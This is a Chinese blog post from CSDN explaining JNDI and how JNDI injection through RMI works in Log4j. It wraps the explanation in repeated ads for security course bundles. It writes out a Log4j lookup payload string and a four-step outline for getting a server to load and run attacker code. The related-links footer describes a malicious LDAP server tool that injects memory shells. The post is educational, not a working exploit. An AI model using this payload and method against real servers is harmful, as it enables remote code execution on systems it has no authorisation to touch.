JNDI以及利用JNDI进行漏洞攻击_jndi+rmi解决漏洞

最新推荐文章于 2024-05-31 11:03:01 发布
最新推荐文章于 2024-05-31 11:03:01 发布
阅读量331 收藏 5
点赞数 4
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84254364/article/details/138976980
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

目录服务

目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象,这么说可能不太好理解,我们举个例子:比如你要在某个学校里里找某个人,那么会通过:年级->班级->姓名这种方式来查找,年级、班级、姓名这些就是某个人的属性,这种层级关系就很像目录关系。

这个JNDI是j2ee时代的产物,现在都基于SpringBoot开发,很少用到这种技术,但由于是java本身自带的东西,导致在java环境中天生就带有这个东西。

JNDI的注入攻击

概念

**RMI服务器:**RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。

用于绑定名称和对象的关系。

JNDI Reference对象:该对象表示其本身在RMI服务器上不存在,需要进行远程下载。

**注入攻击:**通过log4j的指定版本,进行日志打印:log.info(“${jndi:rmi://localhost:309/aa}”)

这个时候,log4j会根据内容判断成需要使用jndi,接着去调用rmi指定的地址,这个rmi服务是我们自己定义的服务,并且aa对象是个Reference对象,这种对象代表请求的名称,在rmi服务器上不存在,需要去一个网站上下载该类,这个设置,可以启动rmi服务器的时候进行设置。并且下载的完成后会进行反序列化,并且这个过程是服务器上执行的,就导致了黑客可以注入任意的代码。

完成攻击有下面几个步骤:

1.想办法让被攻击的服务器上的程序,执行一次类似于这样的日志打印,

log.info(“${jndi:rmi://localhost:309/aa}”),基于常识,我们可以在登录的用户名里面输入这个字符串,因为后台有的时候会打印用户名。

2.本地启动一个rmi服务,该rmi服务需要绑定一个Reference对象,并且指定Reference对象的下载地址。

**3.启动一个http服务来提供下载服务,**在该类中,可以进行恶意代码,必须在static和无参构造方法里面。

**4.这个时候被攻击的服务器会下载该类,**并进行类的反序列号,恶意代码即可被执行,这个过程是在服务端执行的,所以危害巨大。

具体的代码模拟过程:可以参考这个博客

JNDI注入 Reference + RMI 打开了rmi.object.trustURLCodebase还是失败-CSDN博客

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84254364
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java分布式处理技术RMI,JNDI,
08-15
Java分布式处理技术RMI,JNDI,
JavaEE5学习笔记02-JNDIRMI
05-16
JavaEE5学习笔记02-JNDIRMI.
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
jndi-tool JNDI服务利用工具
01-06
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
JNDI,JTA和JMS简介
08-29
主要介绍了JNDI,JTA和JMS的相关内容,包括中文释义,概念解释等,需要的朋友可以了解下。
JNDI以及利用JNDI进行漏洞攻击_jndi+rmi解决漏洞,2024年最新网络安全面试总结
2301_79772893的博客
04-09 343
这个时候,log4j会根据内容判断成需要使用jndi,接着去调用rmi指定的地址,这个rmi服务是我们自己定义的服务,并且aa对象是个Reference对象,这种对象代表请求的名称,在rmi服务器上不存在,需要去一个网站上下载该类,这个设置,可以启动rmi服务器的时候进行设置。**RMI服务器:**RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。目录服务是命名服务的拓展。用于绑定名称和对象的关系。
JNDI以及利用JNDI进行漏洞攻击
qq_23947467的博客
01-30 471
JNDI是java提供的命名和目录服务。 命名服务 命名服务是一种简单的键值对绑定,可以通过键名检索值,RMI就是典型的命名服务 目录服务 目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象,这么说可能不太好理解,我们举个例子:比如你要在某个学校里里找某个人,那么会通过:年级->班级->姓名这种方式来查找,年级、班级、姓名这些就是某个人的属性,这种层级关系就很像目录关系。
5-java安全基础——RMIJNDI实现漏洞利用
网络安全
07-14 3542
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的接口,jndi可以实现给当前服务器的所有资源定义一个唯一的访问标识(例如数据库,网页,文件,连接池等等),方便开发者通过指定的标识来访问对象(目标资源文件,数据库等等)。 关于什么是标识符?可参考RMI注册表,例如在RMI中通过rmi://10.100.0.1:10086/userRmiServices来映射RMI注册表中的userRmiServices远
JNDI注入原理及利用IDEA漏洞复现
人若无名,便可专心练剑
03-18 1336
本篇文章我也是看过很多的博客写的,中间也遇到很多问题,JNDI注入漏洞的危害还是蛮高的。下面我们从RMI以及DNS协议进行详细的漏洞分析,其中漏洞的危害原因主要是lookup()函数可控,可以执行恶意的命令,从而造成恶意攻击
JNDI加载RMIServer,对FastJson的反序列化攻击,.zip
09-30
比赛项目源码
Log4j2 RCE漏洞 JNDI RMI注入的简单复现案例
QDYoungK的博客
12-27 3480
Log4j2 JNDI RMI注入的简单复现案例
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9349
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
【入坑JAVA安全】老公,JNDI注入是什么呀?
一个安全研究员
04-17 6296
想知道?
安全技术系列之JNDI注入
好记性不如烂笔头
09-28 5376
JDNI注入总结
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8254
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
信息安全法规和标准
m0_62207482的博客
05-28 981
自行建设韵味的政府网站不放在境外;39、据《计算机场地安全要求(GB/T9361-2011)》,计算机机房的安全等级分为 A:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求,有完善的计算机器机房安全措施 B级:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求,有较完善的计算机机房安全措施 C级: 不属于A、B级的情况,对计算机机房的安全有基本的要求,有基本的计算机机房安全措施。
网络安全的神秘世界】在win11搭建pikachu靶场
最新发布
weixin_54750312的博客
05-31 621
这个错误发生在mysql 5.7 版本及以上版本会出现的问题,在mysql5.7版本默认的sql配置是:sql_mode=“ONLY_FULL_GROUP_BY”,这个配置严格执行了"SQL92标准",很多从5.6升级到5.7时,为了语法兼容,大部分都会选择调整sql_mode,使其保持跟5.6一致,为了尽量兼容程序。访问http://pikachu/install.php,这是pikachu自带的初始化数据库的php文件。ok,重新访问首页(index.php),进行测试,成功解决。点击“安装/初始化”
web安全渗透测试工具篇(二):sqlmap常用命令和nmap常用命令
HACKONE的博客
05-26 204
这些选项可以用来创建用户自定义函数。--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
jndi可以调用LDAP RMI
07-25
是的,JNDI(Java Naming and Directory Interface)可以用于调用LDAP(Lightweight Directory Access Protocol)和RMI(Remote Method Invocation)。 1. JNDI和LDAP: - JNDI提供了一种标准的Java API,用于通过命名和目录服务访问和操作各种命名和目录服务,包括LDAP。 - JNDI允许开发者通过统一的方式连接和操作LDAP服务器,执行搜索、读取、写入和修改等操作。 - 通过JNDI,可以使用LDAP协议与LDAP服务器进行通信,查询和管理存储在LDAP目录中的数据。 2. JNDIRMI: - JNDI也可以用于查找和访问远程对象,包括使用RMI进行远程方法调用。 - RMI使用JNDI的命名服务来查找远程对象的引用,从而实现客户端与远程对象之间的通信。 - 通过JNDI,可以在分布式系统中定位和获取RMI服务的引用,从而实现远程方法调用。 总结而言,JNDI是一个用于访问和操作各种命名和目录服务的Java API,包括LDAP和RMI。通过JNDI,可以与LDAP服务器进行通信并操作存储在LDAP目录中的数据,也可以定位和获取远程对象的引用,实现RMI的远程方法调用。 希望以上信息对你有所帮助!如果你还有其他关于JNDI、LDAP或RMI的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值